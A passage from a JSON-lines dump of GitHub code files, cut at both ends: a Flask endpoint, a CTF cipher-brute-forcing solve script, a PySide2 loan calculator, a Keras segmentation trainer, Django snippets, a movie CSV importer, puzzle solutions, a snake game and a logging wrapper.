print(\"-------------------------------------------------------------------\")\n print(\"Mapping vertex label to surface\")\n print(\"-------------------------------------------------------------------\")\n\n #\n\n options = options_parse()\n\n #\n\n createVertexLabels(options.lst, options.mat, options.lab)\n","repo_name":"Deep-MI/Hipsta","sub_path":"shapetools/createVertexLabels.py","file_name":"createVertexLabels.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16439947418","text":"from flask import Flask, request, render_template, jsonify, Response\nfrom . 
import ImageReader\nfrom Global import Core\n\n\ndef BadRequestResponse():\n return Response(\"Bad request\", status=400)\n\n#the flask app is entirely contained here but could be broken down further\ndef CreateApp(name = \"__main__\"):\n folder = Core.Config.Get('template_folder')\n folder = folder if folder is not None else 'templates'\n swinney = Flask(name, template_folder=folder)\n #easter egg\n @swinney.route('/', methods=['GET'])\n def Hello():\n return render_template('index.html')\n\n #very simple output but more complex input checker/response builder can be created\n @swinney.route('/binary', methods=['POST'])\n def Endpoint():\n file = request.files['image'] if 'image' in request.files else None\n if file is None:\n return BadRequestResponse()\n img = ImageReader.FromBinary(file)\n if img is None:\n return BadRequestResponse()\n preds = Core.Resolver.model.GetPredictions(img)\n return jsonify(preds)\n\n return swinney\n","repo_name":"SlavaZinevichUSC/FlaskProjectExample","sub_path":"DirectedResearch/Api/Flask/FlaskFactory.py","file_name":"FlaskFactory.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15192338861","text":"encryptedHex = \"72f8a3a1bf16dd894894553a4adf624ed82408090c7908d920c3be82b856e7a60ca3426971897c62d8152304256913a576ce859b8120dcb824b2603b5f\"\n\ndef encrypt(data, i):\n ct = bytearray(len(data))\n s = i\n for idx, byte in enumerate(data):\n s = (0x13 * s + 0x32) % 0xff\n ct[idx] = byte ^ s\n return ct\n\nkey = 26\n\n# Find key\nfor i in range(0,0xff):\n if encrypt(b\"helsectf\", i).hex() in encryptedHex:\n print(\"Bingo\", i)\n key = i\n break\nprint(f\"Testing with key {key}\")\n\n# Brute the system \nconfirmed = \"helse\"\nfor x in range(0, 30):\n for i in range(0,256): \n letter = chr(i)\n attempt = f\"{confirmed}{letter}\".encode()\n hexValue = encrypt(attempt, key).hex()\n if hexValue in encryptedHex:\n confirmed += letter\n\nprint(confirmed)\n","repo_name":"thorleifjacobsen/ctf","sub_path":"helsectf-2023/osint2/kryptert adresse/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7429536739","text":"import sys\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nclass SlotWidget(QtWidgets.QWidget):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n self.amtLabel = QtWidgets.QLabel('Loan Amount')\n self.roiLabel = QtWidgets.QLabel('Rate of Interest')\n self.yrsLabel = QtWidgets.QLabel('No. 
of Years')\n self.emiLabel = QtWidgets.QLabel('EMI per month')\n self.emiValue = QtWidgets.QLCDNumber()\n\n self.emiValue.setSegmentStyle(QtWidgets.QLCDNumber.Flat)\n self.emiValue.setFixedSize(QtCore.QSize(130,30))\n self.emiValue.setDigitCount(8)\n\n self.amtText = QtWidgets.QLineEdit('10000')\n self.roiSpin = QtWidgets.QSpinBox()\n self.roiSpin.setMinimum(1)\n self.roiSpin.setMaximum(15)\n self.yrsSpin = QtWidgets.QSpinBox()\n self.yrsSpin.setMinimum(1)\n self.yrsSpin.setMaximum(20)\n \n self.roiDial = QtWidgets.QDial()\n self.roiDial.setNotchesVisible(True)\n self.roiDial.setMaximum(15)\n self.roiDial.setMinimum(1)\n self.roiDial.setValue(1)\n self.yrsSlide = QtWidgets.QSlider(QtCore.Qt.Horizontal)\n self.yrsSlide.setMaximum(20)\n self.yrsSlide.setMinimum(1)\n\n self.calculateButton = QtWidgets.QPushButton('Calculate EMI')\n\n self.myGridLayout = QtWidgets.QGridLayout()\n\n self.myGridLayout.addWidget(self.amtLabel, 0, 0)\n self.myGridLayout.addWidget(self.roiLabel, 1, 0)\n self.myGridLayout.addWidget(self.yrsLabel, 2, 0)\n self.myGridLayout.addWidget(self.amtText, 0, 1)\n self.myGridLayout.addWidget(self.roiSpin, 1, 1)\n self.myGridLayout.addWidget(self.yrsSpin, 2, 1)\n self.myGridLayout.addWidget(self.roiDial, 1, 2)\n self.myGridLayout.addWidget(self.yrsSlide, 2, 2)\n self.myGridLayout.addWidget(self.calculateButton, 3, 1)\n\n self.setLayout(self.myGridLayout)\n self.setWindowTitle(\"A simple EMI calculator\")\n\n self.roiDial.valueChanged.connect(self.roiSpin.setValue)\n self.connect(self.roiSpin, QtCore.SIGNAL(\"valueChanged(int)\"), self.roiDial.setValue)\n self.yrsSlide.valueChanged.connect(self.yrsSpin.setValue)\n\n self.connect(self.yrsSpin, QtCore.SIGNAL(\"valueChanged(int)\"), self.yrsSlide,QtCore.SLOT(\"setValue(int)\"))\n self.connect(self.calculateButton, QtCore.SIGNAL(\"clicked()\"), self.showEMI)\n def showEMI(self):\n loanAmount = float(self.amtText.text())\n rateInterest = float( float (self.roiSpin.value() / 12) / 100)\n noMonths = int(self.yrsSpin.value() * 12)\n emi = (loanAmount * rateInterest) * ( ( ( (1 + rateInterest) ** noMonths ) / ( ( (1 + rateInterest) ** noMonths ) - 1) ))\n self.emiValue.display(emi)\n self.myGridLayout.addWidget(self.emiLabel, 4, 0)\n self.myGridLayout.addWidget(self.emiValue, 4, 2)\n\n# define a new slot that receives and prints a string\ndef printText(text):\n print(text)\n\nclass CustomSignal(QtCore.QObject):\n # create a new signal\n mySignal = QtCore.Signal(str)\n \nif __name__ == '__main__':\n try:\n myObject = CustomSignal()\n # connect signal and slot\n myObject.mySignal.connect(printText)\n # emit signal\n myObject.mySignal.emit(\"Hello, Universe!\")\n except Exception:\n print(sys.exc_info()[1])\n \n# if __name__ == \"__main__\" :\n app = QtWidgets.QApplication(sys.argv)\n win = SlotWidget()\n win.show()\n sys.exit(app.exec_())\n ","repo_name":"yojulab/lecture_pyside2","sub_path":"Lecture_pyside/SignalSlot2_pyside2.py","file_name":"SignalSlot2_pyside2.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27059860222","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.callbacks import (EarlyStopping, ModelCheckpoint, ReduceLROnPlateau,\n TensorBoard)\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import get_file\nfrom PIL import Image\nimport cv2\nimport glob\nfrom res_zp_deeplab import 
res_zp_Deeplabv3\nfrom tensorflow.keras.losses import categorical_crossentropy\n\n# -------------------------------------------------------------#\n# Dice loss\n# -------------------------------------------------------------#\ndef dsc(y_true, y_pred):\n    smooth = 1.\n    y_true_f = K.flatten(y_true)\n    y_pred_f = K.flatten(y_pred)\n    intersection = K.sum(y_true_f * y_pred_f)\n    score = (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n    return score\n\ndef dice_loss(y_true, y_pred):\n    loss = 1 - dsc(y_true, y_pred)\n    return loss\n# -------------------------------------------------------------#\n# Focal Tversky loss\n# -------------------------------------------------------------#\ndef tversky(y_true, y_pred):\n    smooth = 1.\n    y_true_pos = K.flatten(y_true)\n    y_pred_pos = K.flatten(y_pred)\n    true_pos = K.sum(y_true_pos * y_pred_pos)\n    false_neg = K.sum(y_true_pos * (1 - y_pred_pos))\n    false_pos = K.sum((1 - y_true_pos) * y_pred_pos)\n    alpha = 0.7\n    return (true_pos + smooth) / (true_pos + alpha * false_neg + (1 - alpha) * false_pos + smooth)\n\n\ndef focal_tversky(y_true, y_pred):\n    y_true = tf.cast(y_true, tf.float32)\n    y_pred = tf.cast(y_pred, tf.float32)\n\n    pt_1 = tversky(y_true, y_pred)\n    gamma = 0.75\n    return K.pow((1 - pt_1), gamma)\n\n\ndef tversky_loss(y_true, y_pred):\n    return 1 - tversky(y_true, y_pred)\n\ndef unit_loss(y_true, y_pred):\n    return (2 - tversky(y_true, y_pred)-dsc(y_true, y_pred))/2\n\n\n# -------------------------------------------------------------#\n# IoU\n# -------------------------------------------------------------#\ndef iou(y_true, y_pred):\n    smooth = 1.\n    intersection = K.sum(y_true * y_pred)\n    sum = K.sum(y_true + y_pred)\n    iou = (intersection + smooth) / (sum - intersection + smooth)\n    return iou\n\n# -------------------------------------------------------------#\n# A generator to read images and labels\n# -------------------------------------------------------------#\ndef generate_arrays_from_file(lines, batch_size):\n    n = len(lines)\n    i = 0\n    while 1:\n        X_train = []\n        Y_train = []\n        for _ in range(batch_size):\n            if i == 0:\n                np.random.shuffle(lines)\n            name = lines[i].split(';')[0]\n            img = glob.glob(\"./img/\" + name)\n            img = cv2.resize(cv2.imread(img[0], 1), (int(WIDTH), int(HEIGHT)))\n            img = np.array(img) / 255.0\n            X_train.append(img)\n            name = lines[i].split(';')[1].split()[0]\n            label = glob.glob(r\"./label/\" + name)\n            label = cv2.resize(cv2.imread(label[0], 0), (int(WIDTH), int(HEIGHT)))\n            label = np.array(label) / 255.0\n            if len(np.shape(label)) == 3:\n                label = np.array(label)[:, :, 0]\n            label = np.reshape(np.array(label), [-1])\n            one_hot_label = np.eye(NCLASSES)[np.array(label, np.int32)]\n            Y_train.append(one_hot_label)\n            # advance to the next sample, wrapping (and reshuffling) at the end of the list\n            i = (i + 1) % n\n        yield (np.array(X_train), np.array(Y_train))\n\nif __name__ == \"__main__\":\n    # ------------------------------------------------------------------------------------------#\n    # Define the height and width of the input image, and the number of types\n    # ------------------------------------------------------------------------------------------#\n    HEIGHT = 512\n    WIDTH = 512\n    batch_size = 4\n    NCLASSES = 2\n\n    log_dir = \"./log/\"\n    lr_set = 1e-7\n    Xcep_weight_dir = None#r\"C:\\wyh\\deeplab\\deeplabv3-X\\text_xception.h5\"\n    model = res_zp_Deeplabv3(classes=NCLASSES, input_shape=(HEIGHT, WIDTH, 3))#,train_cl=True,Xcep_weight_dir=Xcep_weight_dir)\n    weights_path = './log/last1.h5'\n    model.load_weights(weights_path, by_name=True)\n\n    \n    with open(\"./train.txt\", \"r\") as f:\n        lines = f.readlines()\n\n    
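# fixed seed so the train/val split below is reproducible across runs\n    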
np.random.seed(10101)\n np.random.shuffle(lines)\n np.random.seed(None)\n num_val = int(len(lines) * 0.1)\n num_train = len(lines) - num_val\n\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-LOSS{loss:.3f}-val_LOSS{val_loss:.3f}.h5',\n monitor='val_loss', save_weights_only=True, save_best_only=True,mode='min')\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, verbose=1,mode='min')\n early_stopping = EarlyStopping(monitor='val_iou', min_delta=0, patience=10, verbose=1,mode='max')\n\n if True:\n lr = lr_set\n #batch_size = 2\n model.compile(loss=dice_loss,#focal_tversky,#dice_loss,#tversky_loss,#'categorical_crossentropy',#custom_loss,\n optimizer=Adam(lr=lr),\n metrics=[ dice_loss,tversky_loss,focal_tversky, iou,'acc'])\n\n print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))\n model.fit_generator(generate_arrays_from_file(lines[:num_train], batch_size),\n steps_per_epoch=max(1, num_train // batch_size),\n validation_data=generate_arrays_from_file(lines[num_train:], batch_size),\n validation_steps=max(1, num_val // batch_size),\n epochs=100,\n initial_epoch=0,\n callbacks=[checkpoint, reduce_lr, tensorboard_callback])#, early_stopping])\n model.save_weights(log_dir + 'last1.h5')\n\n","repo_name":"dia123blo/MCASPP_Deeplabv3-","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7113504775","text":"from django.urls import path\nfrom . import views\napp_name = 'todos'\nurlpatterns = [\n path('', views.index, name = 'home'),\n path('show/', views.show_todo, name = 'id'),\n path('create', views.create, name = 'create'),\n path('postTodo', views.postTodo, name = 'postTodo'),\n path('/delete', views.deleteTodo, name = 'deleteTodo')\n]","repo_name":"sawrozpdl/djangoapp","sub_path":"todos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14299729487","text":"import csv\nimport sqlite3\n\nconn = sqlite3.connect('movie.db')\ncur = conn.cursor()\nprint(\"connected to sqlite3\")\n\n\ndef db_drop_table():\n cur.execute(\"DROP TABLE IF EXISTS movie_table;\")\n print(\"Table cleared\")\n\ndef db_create_table():\n cur.execute(\"CREATE TABLE IF NOT EXISTS movie_table (\"\n \"color, director_name, num_critic_for_reviews, duration, director_facebook_likes, \"\n \"actor_3_facebook_likes, actor_2_name, actor_1_facebook_likes, \"\n \"gross REAL, \"\n \"genres, actor_1_name, movie_title, num_voted_users, cast_total_facebook_likes, \"\n \"actor_3_name, facenumber_in_poster, plot_keywords, \"\n \"movie_imdb_link, num_user_for_reviews, language, country, content_rating, \"\n \"budget REAL, \"\n \"title_year, actor_2_facebook_likes, imdb_score, aspect_ratio, movie_facebook_likes);\")\n\n print(\"Table created successfully\")\n\n\ndef db_import_csv():\n with open('movie_metadata.csv', 'r', encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader)\n for line in csv_reader:\n if line[8] != '' and line[22] != '':\n conn.execute(\"INSERT into movie_table values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\",\n (str(line[0]), str(line[1]), str(line[2]), str(line[3]), str(line[4]), str(line[5]),\n str(line[6]), str(line[7]), 
float(line[8]), str(line[9]), str(line[10]), str(line[11]),\n str(line[12]), str(line[13]), str(line[14]), str(line[15]), str(line[16]), str(line[17]),\n str(line[18]), str(line[19]), str(line[20]), str(line[21]), float(line[22]),\n str(line[23]),\n str(line[24]), str(line[25]), str(line[26]), str(line[27])))\n\n print(\"Data imported successfully\")\n\n\ndb_drop_table()\ndb_create_table()\ndb_import_csv()\nconn.commit()\nconn.close()\nprint(\"close connection to sqlite3\")\n","repo_name":"FuqingWang/Movie_Analyzer","sub_path":"data_importer.py","file_name":"data_importer.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23323264673","text":"# -*- coding:utf-8 -*-\nimport django\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db import connections\nfrom django.core.management.color import no_style\n\n\nsettings.configure(\n DEBUG=True,\n DATABASES={\"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\"\n }},\n INSTALLED_APPS=[__name__]\n)\n\ndjango.setup()\n\n\ndef create_table(model):\n connection = connections['default']\n if hasattr(connection, \"schema_editor\"):\n with connection.schema_editor() as schema_editor:\n schema_editor.create_model(model)\n else:\n cursor = connection.cursor()\n sql, references = connection.creation.sql_create_model(model, no_style())\n for statement in sql:\n cursor.execute(statement)\n\n for f in model._meta.many_to_many:\n create_table(f.rel.through)\n\n\nclass X(models.Model):\n name = models.CharField(max_length=255, default=\"foo\", blank=True)\n\n class Meta:\n app_label = __name__\n\n\nclass Y(models.Model):\n name = models.CharField(max_length=255, default=\"foo\", blank=True)\n\n class Meta:\n app_label = __name__\n\n\nclass XorY(models.Model):\n x_id = models.IntegerField(null=True)\n y_id = models.IntegerField(null=True)\n\n class Meta:\n app_label = __name__\n managed = False\n\n def convert(self):\n if self.x_id != -1:\n return X(id=self.x_id)\n else:\n return Y(id=self.y_id)\n\n\ndef create_view():\n connection = connections['default']\n cursor = connection.cursor()\n sql = \"\"\"\\\ncreate view {prefix}_xory as\n select id as x_id,\n -1 as y_id,\n -1 as id\n from {prefix}_x\n union all\n select -1 as x_id,\n id as y_id,\n -1 as id\n from {prefix}_y\n\"\"\".format(prefix=__name__)\n cursor.execute(sql)\n cursor.fetchall()\n\nif __name__ == \"__main__\":\n import logging\n logging.basicConfig(level=logging.DEBUG)\n\n django.setup()\n\n create_table(X)\n create_table(Y)\n create_view()\n\n xs = X.objects.bulk_create([X(id=1), X(id=2), X(id=3)])\n ys = Y.objects.bulk_create([Y(id=1), Y(id=2), Y(id=3)])\n\n print(X.objects.count())\n for x_or_y in XorY.objects.all():\n instance = x_or_y.convert()\n instance.name = \"bar\"\n instance.save()\n print(X.objects.count())\n","repo_name":"podhmo/django-sandbox","sub_path":"model-sample5.py","file_name":"model-sample5.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"8827796112","text":"import pandas as pd\r\nfrom collections import defaultdict\r\n\r\nclass HoloCSV():\r\n def __init__(self, csv_file):\r\n self.original = pd.read_csv(csv_file)\r\n self.original = self.original.dropna()\r\n self.total_posts_dict = defaultdict(int)\r\n self.day_count_dict = defaultdict(int)\r\n self.list_of_flairs = ['Subbed/TL', 'Meme', 'Music', 
'Streams/Videos', 'Discussion',\r\n 'Fan Content (OP)', 'Misc.', 'Fan Content (Non-OP)', 'Suggestions', 'Goodies',\r\n 'NSFW', 'None', 'Special'] # special is for hololive member posts\r\n self.total_posts_per_day()\r\n self.post_count_df = self.total_post_df()\r\n self.new_cols(self.post_count_df)\r\n\r\n self.total_posts_per_day(use='day')\r\n self.day_count_df = self.total_post_df(use='day')\r\n self.new_cols(self.day_count_df)\r\n\r\n def get_total_count(self, col, use='date'):\r\n if use == 'day':\r\n self.day_count_dict[col] += 1\r\n else:\r\n self.total_posts_dict[col] += 1\r\n\r\n def total_posts_per_day(self, use='date'):\r\n if use == 'day':\r\n self.original['Day of the Week'].apply(lambda row: self.get_total_count(row, 'day'))\r\n else:\r\n self.original['Date'].apply(lambda row: self.get_total_count(row))\r\n\r\n def total_post_df(self, use='date'):\r\n if use == 'day':\r\n return pd.DataFrame(self.day_count_dict.items(), columns=['Day of the Week', 'Number of Posts'])\r\n else:\r\n return pd.DataFrame(self.total_posts_dict.items(), columns=['Date', 'Number of Posts'])\r\n\r\n def new_cols(self, df):\r\n for flair in self.list_of_flairs:\r\n df[flair] = 0\r\n\r\n def flair_count_adder(self, flair, date, use='date'):\r\n if flair not in self.list_of_flairs:\r\n flair = 'Special'\r\n\r\n if use == 'day':\r\n index = self.day_count_df[self.day_count_df['Day of the Week'] == date].index.tolist()\r\n self.day_count_df.loc[index, flair] += 1\r\n else:\r\n index = self.post_count_df[self.post_count_df['Date'] == date].index.tolist()\r\n self.post_count_df.loc[index, flair] += 1\r\n\r\n\r\n def get_individual_flair_count(self, use='date'):\r\n if use == 'day':\r\n self.original.apply(lambda row: self.flair_count_adder(row['Flair'], row['Day of the Week'], 'day'), axis=1)\r\n else:\r\n self.original.apply(lambda row: self.flair_count_adder(row['Flair'], row['Date']), axis=1)\r\n\r\nif __name__ == '__main__':\r\n file = 'C:/Users/phill/Desktop/projects/holo/hololive_sep_2020.csv'\r\n\r\n testing = HoloCSV(file)\r\n print(testing.original['Flair'].unique())\r\n #testing.post_count_df.loc[0, 'Special'] += 1\r\n testing.get_individual_flair_count()\r\n testing.post_count_df.to_csv('post_info.csv', encoding='utf-8', index=False)\r\n\r\n #testing.new_cols(testing.day_count_df)\r\n #print(testing.day_count_df)\r\n testing.get_individual_flair_count(use='day')\r\n testing.day_count_df.to_csv('day_info.csv', encoding='utf-8', index=False)\r\n","repo_name":"laphynis/Analysis-of-r-Hololive","sub_path":"cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23547013491","text":"num_of_loops = int(input())\n\ndef solution(case):\n case = case.split(\" \")\n pancakes = case[0]\n k = int(case[1])\n total_flips = 0\n #print(pancakes, str(k), \"IMPOSSIBLE\")\n counter = 0\n pancakes = list(pancakes)\n while (counter < len(pancakes) - k + 1):\n if (pancakes[counter] == \"-\"):\n for j in range(counter, counter + k):\n if (pancakes[j] == \"-\"):\n pancakes[j] = \"+\"\n else:\n pancakes[j] = \"-\"\n #print(j)\n #print(pancakes)\n #print(\"flips\")\n total_flips += 1\n counter += 1\n cond = True\n for i in range(len(pancakes)):\n if (pancakes[i] == \"-\"):\n cond = False\n #print(total_flips, cond)\n if (cond):\n return str(total_flips)\n else:\n return (\"IMPOSSIBLE\")\n return (\" \")\n\nfor i in range(num_of_loops):\n print(\"Case #\"+str(i+1)+\": \" + 
solution(input()))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3633.py","file_name":"3633.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26170982001","text":"import palindrome as pd\nlol=[]\nn=int(input(\"Enter the number of words:\"))\nfor i in range(0,n):\n l=[]\n s=input(\"Enter the word:\")\n l.append(s)\n lol.append(l)\nfor i in lol:\n for j in i:\n if(pd.recpalindrome(j)==True):\n print(j,\"is a palindrome\")\n else:\n print(j,\"is not a palindrome\")\n","repo_name":"nithu2109/PythonLLabsem5","sub_path":"Lab on 11-10/Problem 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74893203713","text":"import pygame\nimport sys\nimport random\n\nclass snake(object):\n def __init__(self):\n self.length = 1\n self.width = 1\n self.positions = [((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))]\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT])\n self.color = (93, 216, 228)\n\n def get_head_pos(self):\n return self.positions[0]\n\n def turn(self,point):\n if self.length > 1 and (point[0]*-1, point[1]*-1) == self.direction:\n return\n else:\n self.direction = point\n \n def move(self, score):\n current = self.get_head_pos()\n x,y = self.direction\n new = (((current[0] + x*GRID_SIZE) % SCREEN_WIDTH), (current[1] + y*GRID_SIZE) % SCREEN_HEIGHT)\n if len(self.positions) > 2 and new in self.positions[2:]:\n self.reset()\n return 0\n else:\n self.positions.insert(0, new)\n if len(self.positions) > self.length:\n self.positions.pop()\n return score\n\n def reset(self):\n self.length = 1\n self.positions = [((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))]\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT])\n \n def draw(self, surface):\n for p in self.positions:\n r = pygame.Rect((p[0], p[1]), (GRID_SIZE, GRID_SIZE))\n pygame.draw.rect(surface, self.color, r)\n pygame.draw.rect(surface, (17, 24, 47), r, 1)\n\n def handle_keys(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.turn(UP)\n if event.key == pygame.K_DOWN:\n self.turn(DOWN)\n if event.key == pygame.K_LEFT:\n self.turn(LEFT)\n if event.key == pygame.K_RIGHT:\n self.turn(RIGHT)\n\nclass food(object):\n def __init__(self):\n self.position = (0,0)\n self.color = (223, 163, 49)\n self.randomize_pos()\n\n def randomize_pos(self):\n self.position = (random.randint(0, GRID_WIDTH-1) * GRID_SIZE, random.randint(0, GRID_HEIGHT-1) * GRID_SIZE)\n\n def draw(self,surface):\n r = pygame.Rect((self.position[0], self.position[1]), (GRID_SIZE, GRID_SIZE)) \n pygame.draw.rect(surface, self.color, r)\n pygame.draw.rect(surface, (17, 24, 47), r, 1)\n\ndef drawGrid(surface):\n for y in range(0, int(GRID_HEIGHT)):\n for x in range(0, int(GRID_WIDTH)):\n if (x + y) % 2 == 0:\n r = pygame.Rect((x*GRID_SIZE, y*GRID_SIZE), (GRID_SIZE,\n GRID_SIZE))\n pygame.draw.rect(surface, (17, 24, 47), r)\n else:\n rr = pygame.Rect((x*GRID_SIZE, y*GRID_SIZE), (GRID_SIZE, GRID_SIZE))\n pygame.draw.rect(surface, (23, 35, 58), rr)\n\nSCREEN_WIDTH = 1600\nSCREEN_HEIGHT = 1600\n\nGRID_SIZE = 80\nGRID_WIDTH = SCREEN_HEIGHT / GRID_SIZE\nGRID_HEIGHT = SCREEN_WIDTH / GRID_SIZE\n\nUP = (0, -1)\nDOWN = (0, 1)\nLEFT = (-1, 0)\nRIGHT = (1, 0)\n\ndef main():\n pygame.init()\n\n clock = 
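Editor's aside on the Code Jam pancake record above: the same left-to-right greedy, restated as a compact sketch. The greedy is forced because the leftmost '-' can only be fixed by flipping the window that starts there; function and variable names are my own.

def min_flips(pancakes: str, k: int) -> str:
    """Greedy flipper; returns the flip count or IMPOSSIBLE."""
    cakes = [c == "+" for c in pancakes]
    flips = 0
    for i in range(len(cakes) - k + 1):
        if not cakes[i]:  # leftmost '-' must be fixed by flipping here
            for j in range(i, i + k):
                cakes[j] = not cakes[j]
            flips += 1
    return str(flips) if all(cakes) else "IMPOSSIBLE"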
pygame.time.Clock()\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0 ,32)\n\n surface = pygame.Surface(screen.get_size())\n surface = surface.convert()\n drawGrid(surface)\n\n snek = snake()\n snaks = []\n for i in range(20):\n snack = food()\n snaks.append(snack)\n myfont = pygame.font.SysFont('arial', 64)\n \n score = 0\n while(True):\n clock.tick(10)\n snek.handle_keys()\n\n drawGrid(surface)\n score = snek.move(score)\n if score == 0 and len(snaks) > 20:\n del snaks[20:]\n for snack in snaks:\n if snek.get_head_pos() == snack.position:\n snek.length += 1\n score += 1\n snack.randomize_pos()\n if len(snaks) < snek.length**2:\n for i in range(int(snek.length%5)):\n snak = food()\n snaks.append(snak)\n snek.draw(surface)\n snack.draw(surface)\n screen.blit(surface, (0, 0))\n text = myfont.render(\"Score {0}\".format(score), 1, (255, 255, 255))\n screen.blit(text, (5, 10))\n pygame.display.update()\n\nmain()\n","repo_name":"calvang/Snake-but-he-be-feasting","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17922295997","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nlog_utils.py - wraps python loggging facility for simple usage\n\"\"\"\nimport unittest\nimport logging.handlers\nimport os.path\nfrom datetime import datetime\nfrom file_utils import ReverseFileIterator\n\nDEFAULT_LOG_LEVEL = \"DEBUG\"\n\n# anything going wrong in this module\nclass LogUtilsError(Exception):\n \"\"\"\n exception for anything going wrong in this module\n \"\"\"\n def __init__(self, value):\n \"\"\"\n This is the exception constructor method\n \"\"\"\n Exception.__init__(self)\n self.value = value\n\n def __str__(self):\n \"\"\"\n Convert error object to a string\n \"\"\"\n return repr(self.value)\n\n# Logger class, features:\n# 1) the caller's file path and line number are printed with each message\n# 2) multiple instantiations of this object are possible in the same program\n# wherever you need to log, instantiate a Logger object and call its\n# debug() or info() or warning() or critical() function with a string\n#\n# Example usage:\n# >>> my_log_utils = Logger(\"log_filename\", \"DEBUG\")\n# >>> my_log_utils.debug(\"oh no, what have i done!\")\n# or\n# >>> my_log_utils.info(\"oh no, what have i done!\")\n# and so on..\n#\n# 1st argument to Logger(): the filename to which logging occurs\n# 2nd argument to Logger: the log level above which we do not log\n\nclass Logger():\n \"\"\"\n Analyze video text to find entities (cards from the cards table)\n in it and return a list of entities per video as well as a score\n for each entity, reflecting the confidence that the entity\n corresponds to entities depicted in the video. 
The main function\n to use from this class is analyzeVideoEntities() but it has other\n useful text analysis tools embedded.\n \"\"\"\n\n def __init__(self, s_log_filename, s_log_level=os.environ.get('LOG_LEVEL')):\n \"\"\"\n Constructor: initializes logging\n 1st argument: the filename to which logging occurs\n 2nd argument: the log level above which we do not log\n (hierarchy is debug->info->warning->error->critical)\n \"\"\"\n if not s_log_level:\n s_log_level = DEFAULT_LOG_LEVEL\n\n self._log = self._init_logging(s_log_filename, s_log_level)\n\n\n @staticmethod\n def _init_logging(s_log_filename, s_log_level):\n \"\"\"\n Set up the member variable self._log for logging use.\n \"\"\"\n # NB: using the log filename as the log_utils name\n log_utils = logging.getLogger(s_log_filename)\n\n # this is how we tell if we have already set-up the handlers for\n # the log_utils instantiated in this class, if yes, don't do it again..\n if log_utils.handlers:\n # we have a handler already, we do need to set up its formatter\n # to the\n return log_utils\n\n # max size of log file before it gets rotated, not relevant to html\n # logging\n max_log_file_size = 9000000\n\n # number of backups we keep of log files when they get recycled when\n # they reach MAX_LOG_FILE_SIZE number of bytes, not relevant to html\n # logging\n max_log_file_backups = 9\n\n log_utils.propagate = False\n\n log_level_dict = {\n 'DEBUG': logging.DEBUG,\n 'INFO': logging.INFO,\n 'WARNING': logging.WARNING,\n 'ERROR': logging.ERROR,\n 'CRITICAL': logging.CRITICAL\n }\n\n log_utils.setLevel(log_level_dict[s_log_level.upper()])\n\n handler = logging.handlers.RotatingFileHandler(\n s_log_filename,\n maxBytes=max_log_file_size,\n backupCount=max_log_file_backups)\n\n formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\")\n\n handler.setFormatter(formatter)\n log_utils.addHandler(handler)\n\n return log_utils\n\n # NOTE: the functions below have repeated code - it has to remain\n # this way, because when the repeated code (first four lines of\n # each of the functions below) is put in its own function, it\n # messes up the value returned by self._log.findCaller() such that\n # instead of returning the file which called this module, it returns\n # this module's file.\n\n def debug(self, s_message):\n \"\"\"\n write debug 